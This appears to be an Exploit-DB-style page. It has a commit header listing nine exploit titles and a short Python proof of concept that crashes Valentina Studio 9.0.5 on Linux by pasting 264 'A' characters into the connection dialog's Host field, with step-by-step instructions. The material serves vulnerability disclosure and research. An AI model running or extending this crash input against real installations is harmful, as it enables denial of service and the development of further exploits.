f7381cfe15
9 changes to exploits/shellcodes Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC) Virtual VCR Max .0a - '.vcr' Buffer Overflow (PoC) ScreenStream 3.0.15 - Denial of Service AirDrop 2.0 - Denial of Service (DoS) RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH) Memu Play 6.0.7 - Privilege Escalation MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection EI-Tube 3 - SQL Injection
23 lines
No EOL
812 B
Python
Executable file
23 lines
No EOL
812 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)
|
|
# Date: 20/02/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://valentina-db.com/en/
|
|
# Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw
|
|
# Version: 9.0.5
|
|
# Tested on: Linux kali amd64
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script "vstudio.py", it will create a new file "vstudio.txt"
|
|
# 2.- Copy the text from the generated vstudio.txt file to clipboard
|
|
# 3.- Open VStudio
|
|
# 4.- Go to File > Connect to...
|
|
# 5.- Click on Valentina Server or SQLite Server
|
|
# 6.- Paste clipboard in 'Host' field
|
|
# 7.- Click on button -> Connect
|
|
# 8.- Crashed
|
|
|
|
buffer = "\x41" * 264
|
|
f = open ("vstudio.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |